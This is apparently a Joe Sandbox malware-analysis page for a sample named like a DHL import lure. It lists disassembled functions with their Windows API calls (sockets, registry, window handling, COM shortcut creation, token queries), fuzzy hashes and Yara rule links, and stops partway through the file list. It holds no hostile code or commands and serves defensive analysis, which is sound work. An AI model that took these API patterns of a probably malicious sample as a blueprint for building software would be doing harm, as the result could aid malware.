Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: c53a52d7ffd9f05e2eedaf3590c1b884e8083198f5ba37b244bbd01829264612
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: DA113D71540B05AAE521BFB0CC4BFCB7FECBF80710F440C25B29DAA0D2DAA9B5A54660

Function 0054DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0054DA74
LoadStringW.USER32(00000000), ref: 0054DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0054DA91
LoadStringW.USER32(00000000), ref: 0054DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0054DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0054DAB9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 9dff7d25fe2e99a750238a203c09f787611880c69f9cbf1c7c4efdf087ce4254
Instruction ID: 1cb32a75df82d1ab5956b03c47f081581eca50bda915194ef967133f48270118
Opcode Fuzzy Hash: 9dff7d25fe2e99a750238a203c09f787611880c69f9cbf1c7c4efdf087ce4254
Instruction Fuzzy Hash: 84018BF25002087FEB11ABA4AD89EEB3F7CE708705F404459B719E2041E6749DC49F74

Function 0055096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00C1E838,00C1E838), ref: 0055097B
EnterCriticalSection.KERNEL32(00C1E818,00000000), ref: 0055098D
TerminateThread.KERNEL32(00000007,000001F6), ref: 0055099B
WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 005509A9
CloseHandle.KERNEL32(00000007), ref: 005509B8
InterlockedExchange.KERNEL32(00C1E838,000001F6), ref: 005509C8
LeaveCriticalSection.KERNEL32(00C1E818), ref: 005509CF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4b643e411218e0a39a964f6c8ba9088fc52ae331356db3f3f62a09b22f9a766d
Instruction ID: 24f1a452a1033c7d9e921a79b51be20220f40936d6339f14c24368e1e35a93bb
Opcode Fuzzy Hash: 4b643e411218e0a39a964f6c8ba9088fc52ae331356db3f3f62a09b22f9a766d
Instruction Fuzzy Hash: 52F01D32442502ABD7415F94EE88AD6BF35BF11702F40202AF205618A5C77494A9EF90

Function 004E5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004E5D30
GetWindowRect.USER32(?,?), ref: 004E5D71
ScreenToClient.USER32(?,?), ref: 004E5D99
GetClientRect.USER32(?,?), ref: 004E5ED7
GetWindowRect.USER32(?,?), ref: 004E5EF8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 90d06f55e31e665260fed9dc8852679539f80ef8f2d888a9ca8f2aa6d44bf456
Instruction ID: a3267f276fe5f346d4c4035a6b8910f7243e74d1db1a89fae621b709287c8133
Opcode Fuzzy Hash: 90d06f55e31e665260fed9dc8852679539f80ef8f2d888a9ca8f2aa6d44bf456
Instruction Fuzzy Hash: 7AB18A34A0078ADBDB10CFA9D4807EEBBF1FF58315F14841AE8A9D7290DB34AA41DB54

Function 005101B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 005100BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005100D6
__allrem.LIBCMT ref: 005100ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0051010B
__allrem.LIBCMT ref: 00510122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00510140

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: 4c9cd0cff3ba1be7fbb3667349f9a121ef35b74a631632317798b2b9768b3df8
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 6481E671A00B07ABF724AA28CC45BAF7BA8BF85324F244539F551D66C1EBB4D9C0C750

Function 00561D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00563149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0056101C,00000000,?,?,00000000), ref: 00563195

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00561DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00561DE1
WSAGetLastError.WSOCK32 ref: 00561DF2
inet_ntoa.WSOCK32(?), ref: 00561E8C
htons.WSOCK32(?,?,?,?,?), ref: 00561EDB
_strlen.LIBCMT ref: 00561F35

Part of subcall function 005439E8: _strlen.LIBCMT ref: 005439F2

Part of subcall function 004E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,004FCF58,?,?,?), ref: 004E6DBA
Part of subcall function 004E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,004FCF58,?,?,?), ref: 004E6DED

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: c2522444673d56f35198b6f87e1aa5d5dc2b4135f19359f1bad39134d9c8e94d
Instruction ID: 5e4f289cd7fa9adf4f6d344c800f121d83916c9f57924b60b1336cee324a13b7
Opcode Fuzzy Hash: c2522444673d56f35198b6f87e1aa5d5dc2b4135f19359f1bad39134d9c8e94d
Instruction Fuzzy Hash: 09A1E030504740AFC324EF21C885E3ABBA5BF84318F58894DF5565B2E2CB31ED46CB95

Function 005161FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005082D9,005082D9,?,?,?,0051644F,00000001,00000001,8BE85006), ref: 00516258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0051644F,00000001,00000001,8BE85006,?,?,?), ref: 005162DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005163D8
__freea.LIBCMT ref: 005163E5

Part of subcall function 00513820: RtlAllocateHeap.NTDLL(00000000,?,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6,?,004E1129), ref: 00513852

__freea.LIBCMT ref: 005163EE
__freea.LIBCMT ref: 00516413

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: f6ddfeadff99e9b2ab38c36d9d08d3f5af290ac2ccb18651434a01ad5ae8ecca
Instruction ID: eb4ee5139cc91c59d3a99c8e687f2d78d1a1aaa1cf02a9eeead8194da6b6464b
Opcode Fuzzy Hash: f6ddfeadff99e9b2ab38c36d9d08d3f5af290ac2ccb18651434a01ad5ae8ecca
Instruction Fuzzy Hash: B451BE72600216ABFB258F64DC85EEF7EAAFB84750F154A29F925D7180EB34DCC0D660

Function 0056BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 0056C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0056B6AE,?,?), ref: 0056C9B5
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056C9F1
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA68
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0056BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0056BD25
RegCloseKey.ADVAPI32(00000000), ref: 0056BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0056BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0056BDF3
RegCloseKey.ADVAPI32(?), ref: 0056BDFF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: e6bfca88f02dbb0f8c7b8ab7899184c3fef04b61b415b663ee9f545308eaaf95
Instruction ID: 9a18773cc0d336703efd505a0eb9ef15a38d1a1524708582f91efac700d2b8f1
Opcode Fuzzy Hash: e6bfca88f02dbb0f8c7b8ab7899184c3fef04b61b415b663ee9f545308eaaf95
Instruction Fuzzy Hash: 09819070218241AFD714DF25C885E2ABBF5FF84308F14895DF5598B2A2DB32ED85CB92

Function 0053F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0053F7B9
SysAllocString.OLEAUT32(00000001), ref: 0053F860
VariantCopy.OLEAUT32(0053FA64,00000000), ref: 0053F889
VariantClear.OLEAUT32(0053FA64), ref: 0053F8AD
VariantCopy.OLEAUT32(0053FA64,00000000), ref: 0053F8B1
VariantClear.OLEAUT32(?), ref: 0053F8BB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 9322f8a5d1528d01fc7805a4ba24ce10d7d1e004d55e76f6a7f1ebe3368e92b1
Instruction ID: 32cc6d0dcf68b36345ebfa8bd1602a684052d79252e81692cca9184879c76a4a
Opcode Fuzzy Hash: 9322f8a5d1528d01fc7805a4ba24ce10d7d1e004d55e76f6a7f1ebe3368e92b1
Instruction Fuzzy Hash: B9511932D00301BBCF14AF66D895B29BBA4FF45315F20486BE906DF291DB748C44C7A6

Function 0055910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 004E7620: _wcslen.LIBCMT ref: 004E7625

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 005594E5
_wcslen.LIBCMT ref: 00559506
_wcslen.LIBCMT ref: 0055952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00559585

Strings

X, xrefs: 00559412

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 32f6861dd81d9667d31bf8592fdf4c21f9839800c9caf1851bb40c10d72b0942
Instruction ID: 9aef555d0d3d635a4fc1518ae02dfb5b104f9ef8ed49b1789129f68feb36e56f
Opcode Fuzzy Hash: 32f6861dd81d9667d31bf8592fdf4c21f9839800c9caf1851bb40c10d72b0942
Instruction Fuzzy Hash: EDE1B331504340DFC724DF26C495A6ABBE0FF84319F15896EF8899B2A2DB34DD09CB96

Function 004F920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

BeginPaint.USER32(?,?,?), ref: 004F9241
GetWindowRect.USER32(?,?), ref: 004F92A5
ScreenToClient.USER32(?,?), ref: 004F92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004F92D3
EndPaint.USER32(?,?,?,?,?), ref: 004F9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005371EA

Part of subcall function 004F9339: BeginPath.GDI32(00000000), ref: 004F9357

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: b67302079a48bbb41c67df08dd036887db7acea14c3c583ebe26af0e9d4e0575
Instruction ID: e62b4570b75bd64e20785d7dd166f9bdce33c83e2d25c3944097ed7b60f1ab7b
Opcode Fuzzy Hash: b67302079a48bbb41c67df08dd036887db7acea14c3c583ebe26af0e9d4e0575
Instruction Fuzzy Hash: F841DE71104205AFD720DF24D894FBA7BA8FB59324F10066AFA54872A1C734AC49EB66

Function 005507EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0055080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00550847
EnterCriticalSection.KERNEL32(?), ref: 00550863
LeaveCriticalSection.KERNEL32(?), ref: 005508DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005508F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00550921

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 006c22f096ed5b7df21127b1465026ead6789b572e3442206350138d0f92588c
Instruction ID: 3ff0135de6b30da40824c113878dbffc2b82f3acfd81589cd766935504767c29
Opcode Fuzzy Hash: 006c22f096ed5b7df21127b1465026ead6789b572e3442206350138d0f92588c
Instruction Fuzzy Hash: 3A416B71900205EBDF149F54DC85A6A7B78FF44314F1440AAED04AB297D730DE68EBA4

Function 005781DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0053F3AB,00000000,?,?,00000000,?,0053682C,00000004,00000000,00000000), ref: 0057824C
EnableWindow.USER32(00000000,00000000), ref: 00578272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 005782D1
ShowWindow.USER32(00000000,00000004), ref: 005782E5
EnableWindow.USER32(00000000,00000001), ref: 0057830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0057832F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1b40dbee9fa7a0206bffc2cf7fa6e850b58a0f78707a7da2dda0b198c047c76d
Instruction ID: b54c3856dbe1b7695346f4556489c989570baf79fe0ee01fee4fcb95c50226ae
Opcode Fuzzy Hash: 1b40dbee9fa7a0206bffc2cf7fa6e850b58a0f78707a7da2dda0b198c047c76d
Instruction Fuzzy Hash: 5941A134641A40AFDB55CF18EC9DBB47FE0BB1AB15F188268E60C4F263CB31A845EB40

Function 00544C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00544C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00544CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00544CEA
_wcslen.LIBCMT ref: 00544D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00544D10
_wcsstr.LIBVCRUNTIME ref: 00544D1A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: f1e29e3495029097168f460e9f8009f454625e520b8314f814501d8a640b9416
Instruction ID: 706aff86ea5e145fe13de3cd4e63230cb58aa17349f017c151859ab36be18020
Opcode Fuzzy Hash: f1e29e3495029097168f460e9f8009f454625e520b8314f814501d8a640b9416
Instruction Fuzzy Hash: AD2129316442047BEB155B39AC89FBF7F9CEF45754F10403EF909CE191DA61CC40AAA0

Function 0055581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004E3A97,?,?,004E2E7F,?,?,?,00000000), ref: 004E3AC2

_wcslen.LIBCMT ref: 0055587B
CoInitialize.OLE32(00000000), ref: 00555995
CoCreateInstance.OLE32(0057FCF8,00000000,00000001,0057FB68,?), ref: 005559AE
CoUninitialize.OLE32 ref: 005559CC

Strings

.lnk, xrefs: 00555876, 005558C1, 00555985

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 8afdcc9fb90c2bb74aaea068ed8ba71197095fb8d8e41612a0f137ccd1fd8e65
Instruction ID: 8421e3dc62ceb0696b042fdb866d0686db3dff02853cfb4285126e2ff01d7ff6
Opcode Fuzzy Hash: 8afdcc9fb90c2bb74aaea068ed8ba71197095fb8d8e41612a0f137ccd1fd8e65
Instruction Fuzzy Hash: 5CD164706047019FC704DF25C4A492ABBF1FF89726F14895EF88A9B261E735EC49CB92

Function 0054175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00540FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00540FCA
Part of subcall function 00540FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00540FD6
Part of subcall function 00540FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00540FE5
Part of subcall function 00540FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00540FEC
Part of subcall function 00540FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00541002

GetLengthSid.ADVAPI32(?,00000000,00541335), ref: 005417AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005417BA
HeapAlloc.KERNEL32(00000000), ref: 005417C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 005417DA
GetProcessHeap.KERNEL32(00000000,00000000,00541335), ref: 005417EE
HeapFree.KERNEL32(00000000), ref: 005417F5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
